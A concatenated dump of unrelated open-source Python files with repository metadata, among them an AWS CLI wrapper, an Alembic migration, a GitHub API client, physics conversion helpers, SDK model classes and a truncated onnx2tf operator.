describe-client-vpn-connections : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-client-vpn-connections.html
"""
parameter_display_string = """
# client-vpn-endpoint-id : The ID of the Client VPN endpoint.
"""
add_option_dict = {}
#######################################################################
# setting option use
# ex: add_option_dict["setting_matching_parameter"] = "--owners"
# ex: add_option_dict["setting_key"] = "owner_id"
#######################################################################
# single parameter
# ex: add_option_dict["no_value_parameter_list"] = "--single-parameter"
#######################################################################
# parameter display string
add_option_dict["parameter_display_string"] = parameter_display_string
execute_one_parameter("ec2", "describe-client-vpn-connections", "client-vpn-endpoint-id", add_option_dict)
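# Illustrative invocation (the endpoint id is hypothetical, and the wrapper
# is assumed to read the parameter from the command line):
#   python client-vpn-connection_list.py cvpn-endpoint-0123456789abcdef0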
|
[
"[email protected]"
] | |
e12543041d44d3cb9be84a8134ebde85793d5476
|
1f79d9d02810a944c45fc962c62159035c5a2247
|
/migrations/versions/2ce138017f09_.py
|
44945f5b6e86b3a8d3d753b01cce2d62c3c70333
|
[] |
no_license
|
qsq-dm/mff
|
5f17d6ffd1d4742dc46d1367cff35233af08a450
|
d7f1e6f3fba95fe0d8ebb8937dda64a17e71f048
|
refs/heads/master
| 2020-12-29T02:19:29.037394 | 2016-08-01T15:40:42 | 2016-08-01T15:40:42 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 619 |
py
|
"""empty message
Revision ID: 2ce138017f09
Revises: 38dd6746c99b
Create Date: 2015-12-10 19:14:00.636524
"""
# revision identifiers, used by Alembic.
revision = '2ce138017f09'
down_revision = '38dd6746c99b'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('user_coupon', sa.Column('is_trial', sa.Boolean(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('user_coupon', 'is_trial')
### end Alembic commands ###
|
[
"root@localhost"
] |
root@localhost
|
98dc97fd83c006e87c1140e8bd0d5d01343a1be4
|
289e6f9cf1d37fffb45810144e1a15f0de5c19d5
|
/chiro/import_chiro.py
|
0c60ee96d0de34304dd138784cf52fae28a9e7a1
|
[
"MIT",
"CC0-1.0"
] |
permissive
|
chemical-roles/chemical-roles
|
4eb912d6cc767f465e0e35e34d0c803a96e4d4f3
|
78801264a94a8b2b43ff553020483dd2ef9af993
|
refs/heads/master
| 2023-04-11T14:40:53.846885 | 2022-09-02T11:56:06 | 2022-09-02T11:56:06 | 199,155,107 | 6 | 5 |
MIT
| 2021-08-04T09:14:34 | 2019-07-27T11:17:57 |
Python
|
UTF-8
|
Python
| false | false | 1,492 |
py
|
import logging
from pyobo import get_id_name_mapping, get_obo_graph
RELATIONSHIPS = [
"activator_of",
"agonist_of",
"antagonist_of",
"destabilizer_of",
"inducer_of",
"inhibitor_of",
"modulator_of",
"sensitizer_of",
"stabilizier_of",
]
MAPPING_PREFIXES = ["ncbitaxon", "go", "pr", "hp", "mp"]
def main():
graph = get_obo_graph("chiro")
chebi_mapping = get_id_name_mapping("chebi")
mappings = {prefix: get_id_name_mapping(prefix) for prefix in MAPPING_PREFIXES}
triples = []
for h, data in graph.nodes(data=True):
if not data:
continue
r, t = data["relationship"][0].split()
r = r[: -len("_of")]
h_name = chebi_mapping.get(h)
if h_name is None:
print(f"Could not find name for chemical {h}")
continue
t_namespace = t.split(":")[0].lower()
t_mapping = mappings[t_namespace]
t_name = t_mapping.get(t)
if t_name is None:
print(f"Could not find name for target {t}")
continue
triples.append(("chebi", h, h_name, r, t_namespace, t, t_name))
with open("chiro_import.tsv", "w") as file:
print(
"source_db source_id source_name modulation type target_db target_id target_name",
file=file,
)
for t in sorted(triples):
print(*t, sep="\t", file=file)
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
main()
|
[
"[email protected]"
] | |
c79714327ccf731a9a7f8568306169ba46c9dba8
|
84f2cdc80da796b38433e88d9145cbd797e85f42
|
/flaws/asttools.py
|
c4a8cb3502876a4d90fce1e613bde8734d777a52
|
[
"BSD-2-Clause"
] |
permissive
|
EricSchles/flaws
|
3be808d37fa1bfd050fa8e0ec3791ab7ee1e5365
|
a6de9c2c2a89f79bd67a20535cea6a9ca677f357
|
refs/heads/master
| 2021-01-17T08:05:27.603218 | 2014-08-23T08:07:52 | 2014-08-23T08:07:52 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,318 |
py
|
import ast
def is_write(node):
return isinstance(node, (ast.Import, ast.ImportFrom,
ast.FunctionDef, ast.ClassDef, ast.arguments)) \
or isinstance(node.ctx, (ast.Store, ast.Del, ast.Param))
def is_use(node):
return isinstance(node, ast.Name) \
and isinstance(node.ctx, (ast.Load, ast.Del))
def is_constant(node):
return isinstance(node, ast.Name) and node.id.isupper()
def ast_eval(node):
if isinstance(node, ast.List):
return map(ast_eval, node.elts)
elif isinstance(node, ast.Str):
return node.s
elif isinstance(node, ast.Num):
return node.n
else:
raise ValueError("Don't know how to eval %s" % node.__class__.__name__)
def name_class(node):
if isinstance(node, (ast.Import, ast.ImportFrom)):
return 'import'
elif isinstance(node, ast.FunctionDef):
return 'function'
elif isinstance(node, ast.ClassDef):
return 'class'
elif isinstance(node, ast.Name) and isinstance(node.ctx, ast.Param) \
or isinstance(node, ast.arguments):
return 'param'
else:
return 'variable'
def node_str(node):
return '%s at %d:%d' % (name_class(node), node.lineno, node.col_offset)
def nodes_str(nodes):
return '[%s]' % ', '.join(map(node_str, nodes))
|
[
"[email protected]"
] | |
cbfc0f372350492bb4d3e472bf7a52dee56b078a
|
f3188f1f9da38f995bd65a423b2cc1cd1c31c55f
|
/PythonLeetcode/BinarySearch/easy/744. 寻找比目标字母大的最小字母.py
|
e5560199093099a93e75b3f4098cec0ae680a596
|
[
"MIT"
] |
permissive
|
Lcoderfit/Introduction-to-algotithms
|
34be05019870b6d4d967b0112e7953829448cdb0
|
aea2630be6ca2c60186593d6e66b0a59e56dc848
|
refs/heads/master
| 2023-05-11T01:01:09.222149 | 2021-10-13T03:16:40 | 2021-10-13T03:16:40 | 146,017,809 | 3 | 1 |
MIT
| 2023-05-05T02:22:34 | 2018-08-24T16:56:13 |
Go
|
UTF-8
|
Python
| false | false | 1,829 |
py
|
"""
Approach 1: binary search
Time complexity: O(log n)
Space complexity: O(1)
Approach 2: linear scan
Time complexity: O(n)
Space complexity: O(1)
case1:
a
c f j
case 2:
c
c f j
case 3:
d
c f j
case 4:
g
c f j
case 5:
j
c f j
case 6:
k
c f j
"""
import sys
from typing import List
class Solution:
@staticmethod
def next_greatest_letter(letters: List[str], target: str) -> str:
i, j = 0, len(letters) - 1
# Essentially a left-boundary search: we want the smallest element greater
# than the target, and in a sorted array "smallest" means the left boundary.
# Left boundary: mid collapses toward the left, the right pointer moves to mid.
while i < j:
mid = (i + j) // 2
if letters[mid] <= target:
i = mid + 1
else:
j = mid
if (i == len(letters) - 1) and (letters[i] > target):
return letters[-1]
if (i == len(letters) - 1) and (letters[i] <= target):
return letters[0]
return letters[i]
@staticmethod
def next_greatest_letter1(letters: List[str], target: str) -> str:
i, j = 0, len(letters) - 1
while i <= j:
mid = (i + j) // 2
if letters[mid] <= target:
i = mid + 1
else:
j = mid - 1
if i == len(letters):
return letters[0]
return letters[i]
@staticmethod
def next_greatest_letter2(letters: List[str], target: str) -> str:
for c in letters:
if c > target:
return c
return letters[0]
if __name__ == '__main__':
s = Solution()
for line in sys.stdin:
target_cur = line.strip()
letters_cur = [i for i in input().split(" ")]
res = s.next_greatest_letter(letters_cur, target_cur)
print(res)
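# Worked example (added for illustration): feeding target "d" and then
# letters "c f j" on stdin prints "f"; target "j" wraps around and prints "c".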
|
[
"[email protected]"
] | |
5eb112988098db6980600c2ca4c2ab2b15e030fc
|
11705b5971757122772cc420912b509b1f39255c
|
/web/service/github/api/v3/repositories/Repositories.py
|
bc527209990819a483f3582a0a1b6414ed875d15
|
[
"CC0-1.0",
"Unlicense",
"Apache-2.0",
"MIT"
] |
permissive
|
ytyaru/GitHub.Upload.Delete.CommentAndFile.201703281815
|
4bff9cba1e6bb2bec596d1190eb653169a01c839
|
ce4d6c3830bff9d9c152d1d6224ad317f46ea778
|
refs/heads/master
| 2021-01-20T08:54:00.762565 | 2017-05-03T22:37:38 | 2017-05-03T22:37:38 | 90,199,212 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,598 |
py
|
#!python3
# encoding: utf-8
import requests
import urllib.parse
import json
import web.http.Response
class Repositories:
def __init__(self, data, reqp, response):
self.data = data
self.reqp = reqp
self.response = response
def create(self, name, description=None, homepage=None):
method = 'POST'
endpoint = 'user/repos'
params = self.reqp.get(method, endpoint)
params['data'] = json.dumps({"name": name, "description": description, "homepage": homepage})
print(params)
r = requests.post(urllib.parse.urljoin("https://api.github.com", endpoint), headers=params['headers'], data=params['data'])
return self.response.Get(r, res_type='json')
def gets(self, visibility=None, affiliation=None, type=None, sort='full_name', direction=None, per_page=30):
if (visibility is None) and (affiliation is None) and (type is None):
type = 'all'
self.__raise_param_error(visibility, ['all', 'public', 'private'], 'visibility')
if not(None is affiliation):
for a in affiliation.split(','):
self.__raise_param_error(a, ['owner', 'collaborator', 'organization_member'], 'affiliation')
self.__raise_param_error(type, ['all', 'owner', 'public', 'private', 'member'], 'type')
self.__raise_param_error(sort, ['created', 'updated', 'pushed', 'full_name'], 'sort')
if direction is None:
if sort == 'full_name':
direction = 'asc'
else:
direction = 'desc'
else:
self.__raise_param_error(direction, ['asc', 'desc'], 'direction')
method = 'GET'
endpoint = 'user/repos'
params = self.reqp.get(method, endpoint)
params['headers']['Accept'] = 'application/vnd.github.drax-preview+json'
params['params'] = {}
if not(None is visibility):
params['params']["visibility"] = visibility
if not(None is affiliation):
params['params']["affiliation"] = affiliation
if not(None is type):
params['params']["type"] = type
if not(None is sort):
params['params']["sort"] = sort
if not(None is direction):
params['params']["direction"] = direction
if not(None is per_page):
params['params']["per_page"] = per_page
print(params)
repos = []
url = urllib.parse.urljoin("https://api.github.com", endpoint)
while (None is not url):
print(url)
params = self.reqp.update_otp(params)
print(params)
r = requests.get(url, headers=params['headers'], params=params['params'])
repos += self.response.Get(r, res_type='json')
url = self.response.GetLinkNext(r)
return repos
def __raise_param_error(self, target, check_list, target_name):
if not(target is None) and not(target in check_list):
raise Exception("Parameter Error: [{0}] should be one of the following values. : {1}".format(target_name, check_list))
"""
公開リポジトリの一覧を取得する。
@param [int] since is repository id on github.
"""
def list_public_repos(self, since, per_page=30):
method = 'GET'
endpoint = 'repositories'
params = self.reqp.get(method, endpoint)
params['params'] = json.dumps({"since": since, "per_page": per_page})
print(params)
r = requests.get(urllib.parse.urljoin("https://api.github.com", endpoint), headers=params['headers'])
return self.response.Get(r, res_type='json')
"""
リポジトリを削除する。
引数を指定しなければ、デフォルトユーザのカレントディレクトリ名リポジトリを対象とする。
"""
def delete(self, username=None, repo_name=None):
if None is username:
username = self.data.get_username()
if None is repo_name:
repo_name = self.data.get_repo_name()
endpoint = 'repos/:owner/:repo'
params = self.reqp.get('DELETE', endpoint)
endpoint = endpoint.replace(':owner', username)
endpoint = endpoint.replace(':repo', repo_name)
r = requests.delete(urllib.parse.urljoin("https://api.github.com", endpoint), headers=params['headers'])
return self.response.Get(r)
"""
リポジトリを編集する。
リポジトリ名、説明文、homepageを変更する。
指定せずNoneのままなら変更しない。
"""
def edit(self, name=None, description=None, homepage=None):
if None is name:
name = self.data.get_repo_name()
if None is description:
description = self.data.get_repo_description()
if None is homepage:
homepage = self.data.get_repo_homepage()
endpoint = 'repos/:owner/:repo'
params = self.reqp.get('PATCH', endpoint)
endpoint = endpoint.replace(':owner', self.data.get_username())
endpoint = endpoint.replace(':repo', self.data.get_repo_name())
params['data'] = {}
params['data']['name'] = name
if not(None is description or '' == description):
params['data']['description'] = description
if not(None is homepage or '' == homepage):
params['data']['homepage'] = homepage
r = requests.patch(urllib.parse.urljoin("https://api.github.com", endpoint), headers=params['headers'], data=json.dumps(params['data']))
return self.response.Get(r, res_type='json')
"""
リポジトリのプログラミング言語とそのファイルサイズを取得する。
@param {string} usernameはユーザ名
@param {string} repo_nameは対象リポジトリ名
@return {dict} 結果(JSON形式)
"""
def list_languages(self, username=None, repo_name=None):
if None is username:
username = self.reqp.get_username()
if None is repo_name:
repo_name = self.data.get_repo_name()
endpoint = 'repos/:owner/:repo/languages'
params = self.reqp.get('GET', endpoint)
endpoint = endpoint.replace(':owner', username)
endpoint = endpoint.replace(':repo', repo_name)
r = requests.get(urllib.parse.urljoin("https://api.github.com", endpoint), headers=params['headers'])
return self.response.Get(r, res_type='json')
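# Illustrative usage (names are assumptions; `data`, `reqp` and `response`
# are collaborators injected elsewhere in this codebase):
# repos = Repositories(data, reqp, response)
# print(repos.list_languages('octocat', 'Hello-World'))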
|
[
"[email protected]"
] | |
10c388059eabb303f3a11a60b8fac735303683bb
|
e828fca9d0622710b43222c377adf954df072220
|
/shabanipy/quantum_hall/conversion.py
|
acaf9ac2185f0ef01f596d08336c2ef3d946b958
|
[
"MIT"
] |
permissive
|
jnt299/shabanipy
|
f42cb4abb648e1ce42501a4d1187a74f2a78011c
|
1c2b5b861849ccf76b5ea6aaf0fcbf429aa6bfcf
|
refs/heads/master
| 2022-11-30T17:58:22.295183 | 2020-08-13T19:56:37 | 2020-08-13T19:56:37 | 288,523,531 | 1 | 0 | null | 2020-08-18T17:41:35 | 2020-08-18T17:41:34 | null |
UTF-8
|
Python
| false | false | 3,538 |
py
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright 2019 by ShabaniPy Authors, see AUTHORS for more details.
#
# Distributed under the terms of the MIT license.
#
# The full license is in the file LICENCE, distributed with this software.
# -----------------------------------------------------------------------------
"""Typical Hall bar data conversion routines.
"""
from math import pi, log
import numpy as np
import scipy.constants as cs
GEOMETRIC_FACTORS = {
"Van der Pauw": pi / log(2),
"Standard Hall bar": 0.75,
}
def convert_lock_in_meas_to_diff_res(measured_voltage, bias_current):
"""Convert the voltage measured using a lock-in to differential resistance.
"""
return measured_voltage / bias_current
def kf_from_density(density):
"""Compute the Fermi wavevector from the density.
Parameters
----------
density : float | np.ndarray
Carriers density of the sample expected to be in m^-2
Returns
-------
kf : float | np.ndarray
Fermi wavevector in m^-1.
"""
return np.sqrt(2 * np.pi * density)
def mean_free_time_from_mobility(mobility, effective_mass):
"""Compute the mean free time from the sample mobility
Parameters
----------
mobility : float | np.ndarray
Carriers mobility of the sample in m^2.V^-1.s^-1.
effective_mass : float
Effective mass of the carriers in kg.
Returns
-------
mean_free_time : float | np.ndarray
Mean free time in s.
"""
return mobility * effective_mass / cs.e
def fermi_velocity_from_kf(kf, effective_mass):
"""Compute the Fermi velocity from the Fermi wavelength
Parameters
----------
kf : float | np.ndarray
Fermi wavevector in m^-1.
effective_mass : float | np.ndarray
Effective mass in kg.
Returns
-------
fermi_vel : float | np.ndarray
Fermi velocity in m.s^-1.
"""
return cs.hbar * kf / effective_mass
def fermi_velocity_from_density(density, effective_mass):
"""Compute the Fermi velocity directly from the density.
Parameters
----------
density : : float | np.ndarray
Carriers density of the sample expected to be in m^-2
Returns
-------
fermi_vel : float | np.ndarray
Fermi velocity in m.s^-1.
"""
return fermi_velocity_from_kf(kf_from_density(density), effective_mass)
def diffusion_constant_from_mobility_density(mobility, density, effective_mass):
"""Compute the diffusion constant from mobility and density.
Parameters
----------
mobility : float | np.ndarray
Carriers mobility of the sample in m^2.V^-1.s^-1.
density : : float | np.ndarray
Carriers density of the sample expected to be in m^-2
Returns
-------
diffusion_constant : float | np.ndarray
Diffusion constant of the carriers m^2s^-1.
"""
vf = fermi_velocity_from_density(density, effective_mass)
mft = mean_free_time_from_mobility(mobility, effective_mass)
return vf ** 2 * mft / 2
def htr_from_mobility_density(mobility, density, effective_mass):
"""[summary]
Parameters
----------
mobilities : [type]
[description]
densities : [type]
[description]
Returns
-------
"""
d = diffusion_constant_from_mobility_density(mobility, density, effective_mass)
mft = mean_free_time_from_mobility(mobility, effective_mass)
return cs.hbar / (4 * cs.e * d * mft)
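# Quick sanity check (added illustration): a 2D carrier density of 1e16 m^-2
# gives kf_from_density(1e16) ~ 2.5e8 m^-1, i.e. sqrt(2 * pi * 1e16).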
|
[
"[email protected]"
] | |
54b6d697974e94e58e1db9e716971b7d5af3e9b6
|
551b75f52d28c0b5c8944d808a361470e2602654
|
/huaweicloud-sdk-projectman/huaweicloudsdkprojectman/v4/model/list_issue_comments_v4_request.py
|
52fa5da1dc3b94983d614e5dad194057809f34b9
|
[
"Apache-2.0"
] |
permissive
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
9d6597ce8ab666a9a297b3d936aeb85c55cf5877
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
refs/heads/master
| 2023-05-08T21:32:31.920300 | 2021-05-26T08:54:18 | 2021-05-26T08:54:18 | 370,898,764 | 0 | 0 |
NOASSERTION
| 2021-05-26T03:50:07 | 2021-05-26T03:50:07 | null |
UTF-8
|
Python
| false | false | 4,887 |
py
|
# coding: utf-8
import pprint
import re
import six
class ListIssueCommentsV4Request:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'project_id': 'str',
'issue_id': 'int',
'offset': 'int',
'limit': 'int'
}
attribute_map = {
'project_id': 'project_id',
'issue_id': 'issue_id',
'offset': 'offset',
'limit': 'limit'
}
def __init__(self, project_id=None, issue_id=None, offset=None, limit=None):
"""ListIssueCommentsV4Request - a model defined in huaweicloud sdk"""
self._project_id = None
self._issue_id = None
self._offset = None
self._limit = None
self.discriminator = None
self.project_id = project_id
self.issue_id = issue_id
if offset is not None:
self.offset = offset
if limit is not None:
self.limit = limit
@property
def project_id(self):
"""Gets the project_id of this ListIssueCommentsV4Request.
Project ID
:return: The project_id of this ListIssueCommentsV4Request.
:rtype: str
"""
return self._project_id
@project_id.setter
def project_id(self, project_id):
"""Sets the project_id of this ListIssueCommentsV4Request.
Project ID
:param project_id: The project_id of this ListIssueCommentsV4Request.
:type: str
"""
self._project_id = project_id
@property
def issue_id(self):
"""Gets the issue_id of this ListIssueCommentsV4Request.
Work item ID
:return: The issue_id of this ListIssueCommentsV4Request.
:rtype: int
"""
return self._issue_id
@issue_id.setter
def issue_id(self, issue_id):
"""Sets the issue_id of this ListIssueCommentsV4Request.
Work item ID
:param issue_id: The issue_id of this ListIssueCommentsV4Request.
:type: int
"""
self._issue_id = issue_id
@property
def offset(self):
"""Gets the offset of this ListIssueCommentsV4Request.
Pagination index (offset)
:return: The offset of this ListIssueCommentsV4Request.
:rtype: int
"""
return self._offset
@offset.setter
def offset(self, offset):
"""Sets the offset of this ListIssueCommentsV4Request.
Pagination index (offset)
:param offset: The offset of this ListIssueCommentsV4Request.
:type: int
"""
self._offset = offset
@property
def limit(self):
"""Gets the limit of this ListIssueCommentsV4Request.
Number of items per page (at most 100)
:return: The limit of this ListIssueCommentsV4Request.
:rtype: int
"""
return self._limit
@limit.setter
def limit(self, limit):
"""Sets the limit of this ListIssueCommentsV4Request.
Number of items per page (at most 100)
:param limit: The limit of this ListIssueCommentsV4Request.
:type: int
"""
self._limit = limit
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListIssueCommentsV4Request):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
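# Illustrative usage (not part of the generated file):
# request = ListIssueCommentsV4Request(project_id="p1", issue_id=42, offset=0, limit=10)
# request.to_dict()  # -> {'project_id': 'p1', 'issue_id': 42, 'offset': 0, 'limit': 10}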
|
[
"[email protected]"
] | |
24ab81ff2c511dd5587eebf58083e235fd9bdec7
|
3c000380cbb7e8deb6abf9c6f3e29e8e89784830
|
/venv/Lib/site-packages/cobra/modelimpl/fc/apinninglbl.py
|
f7b4c92b96d82adacf7230e8ed621d61e9384b9f
|
[] |
no_license
|
bkhoward/aciDOM
|
91b0406f00da7aac413a81c8db2129b4bfc5497b
|
f2674456ecb19cf7299ef0c5a0887560b8b315d0
|
refs/heads/master
| 2023-03-27T23:37:02.836904 | 2021-03-26T22:07:54 | 2021-03-26T22:07:54 | 351,855,399 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,523 |
py
|
# coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class APinningLbl(Mo):
meta = ClassMeta("cobra.model.fc.APinningLbl")
meta.isAbstract = True
meta.moClassName = "fcAPinningLbl"
meta.moClassName = "fcAPinningLbl"
meta.rnFormat = ""
meta.category = MoCategory.REGULAR
meta.label = "Abstract Fibre Channel Uplink Pinning Label"
meta.writeAccessMask = 0x601
meta.readAccessMask = 0x601
meta.isDomainable = False
meta.isReadOnly = False
meta.isConfigurable = True
meta.isDeletable = True
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.pol.Def")
meta.concreteSubClasses.add("cobra.model.fc.PinningLbl")
meta.concreteSubClasses.add("cobra.model.fc.PinningLblDef")
meta.rnPrefixes = [
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5579, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "ownerKey", "ownerKey", 15230, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerKey", prop)
prop = PropMeta("str", "ownerTag", "ownerTag", 15231, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerTag", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
|
[
"[email protected]"
] | |
31212698b833a9003fd16b7a5fc99096aa8e5d13
|
b39b0625795b0640a6a68151f2012ce139f423b8
|
/iaas/test/test_flavor_profile_api.py
|
095a47c5a2b57f517a3c35c6945e5b54508299a9
|
[] |
no_license
|
darrylcauldwell/casCodegen
|
8e82b1f08e8260482996aec3d8be10934a65dd03
|
1f1ff9ab8a33102bcfcb8be276d51992d96bcb61
|
refs/heads/master
| 2020-07-27T14:42:28.550855 | 2019-09-17T18:30:28 | 2019-09-17T18:30:28 | 209,127,702 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,495 |
py
|
# coding: utf-8
"""
VMware Cloud Assembly IaaS API
A multi-cloud IaaS API for Cloud Automation Services # noqa: E501
OpenAPI spec version: 2019-01-15
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from api.flavor_profile_api import FlavorProfileApi # noqa: E501
from swagger_client.rest import ApiException
class TestFlavorProfileApi(unittest.TestCase):
"""FlavorProfileApi unit test stubs"""
def setUp(self):
self.api = FlavorProfileApi()  # noqa: E501
def tearDown(self):
pass
def test_create_flavor_profile(self):
"""Test case for create_flavor_profile
Create flavor profile # noqa: E501
"""
pass
def test_delete_flavor_profile(self):
"""Test case for delete_flavor_profile
Delete flavor profile # noqa: E501
"""
pass
def test_get_flavor_profile(self):
"""Test case for get_flavor_profile
Get flavor profile # noqa: E501
"""
pass
def test_get_flavor_profiles(self):
"""Test case for get_flavor_profiles
Get flavor profile # noqa: E501
"""
pass
def test_update_flavor_profile(self):
"""Test case for update_flavor_profile
Update flavor profile # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
1ba90dd656c8980eff31b4972d50accaaff84971
|
971e0efcc68b8f7cfb1040c38008426f7bcf9d2e
|
/tests/artificial/transf_Quantization/trend_MovingAverage/cycle_30/ar_/test_artificial_1024_Quantization_MovingAverage_30__20.py
|
1d8cd7fcd6989efe67729b85e14bd6887518a581
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
antoinecarme/pyaf
|
a105d172c2e7544f8d580d75f28b751351dd83b6
|
b12db77cb3fa9292e774b2b33db8ce732647c35e
|
refs/heads/master
| 2023-09-01T09:30:59.967219 | 2023-07-28T20:15:53 | 2023-07-28T20:15:53 | 70,790,978 | 457 | 77 |
BSD-3-Clause
| 2023-03-08T21:45:40 | 2016-10-13T09:30:30 |
Python
|
UTF-8
|
Python
| false | false | 273 |
py
|
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 1024 , FREQ = 'D', seed = 0, trendtype = "MovingAverage", cycle_length = 30, transform = "Quantization", sigma = 0.0, exog_count = 20, ar_order = 0);
|
[
"[email protected]"
] | |
e0d15eea5b6d89432ba750f5c3a61bdb7bd0ce84
|
730103ddecd23142238defe2a2b1ab3c582cdc45
|
/onnx2tf/ops/ReverseSequence.py
|
c2c8dc8337c257539be89abccb5dab2eb3372482
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
PINTO0309/onnx2tf
|
dcfb0fd8a4810ef1262aa565ba42b5124012bdb2
|
b0e7d106cc69c0ea0fd464c4dd9064a5b0d6668b
|
refs/heads/main
| 2023-08-30T23:28:56.386741 | 2023-08-29T01:48:40 | 2023-08-29T01:48:40 | 541,831,874 | 345 | 45 |
MIT
| 2023-09-14T16:53:12 | 2022-09-27T00:06:32 |
Python
|
UTF-8
|
Python
| false | false | 3,308 |
py
|
import random
random.seed(0)
import numpy as np
np.random.seed(0)
import tensorflow as tf
import onnx_graphsurgeon as gs
from onnx2tf.utils.common_functions import (
get_constant_or_variable,
print_node_info,
inverted_operation_enable_disable,
make_tf_node_info,
get_replacement_parameter,
pre_process_transpose,
post_process_transpose,
)
@print_node_info
@inverted_operation_enable_disable
@get_replacement_parameter
def make_node(
*,
graph_node: gs.Node,
tf_layers_dict: dict,
**kwargs: dict,
):
"""ReverseSequence
Parameters
----------
graph_node: gs.Node
graph_surgeon Node
tf_layers_dict: dict
optype, shape, dtype, tensorflow graph
"""
before_op_output_shape_trans_1 = \
tf_layers_dict.get(graph_node.inputs[0].name, {}).get('before_op_output_shape_trans', True)
before_op_output_shape_trans = \
before_op_output_shape_trans_1
graph_node_input_1 = get_constant_or_variable(
graph_node.inputs[0],
before_op_output_shape_trans,
)
input_tensor = tf_layers_dict[graph_node_input_1.name]['tf_node'] \
if isinstance(graph_node_input_1, gs.Variable) else graph_node_input_1
graph_node_input_2 = get_constant_or_variable(
graph_node.inputs[1],
before_op_output_shape_trans,
)
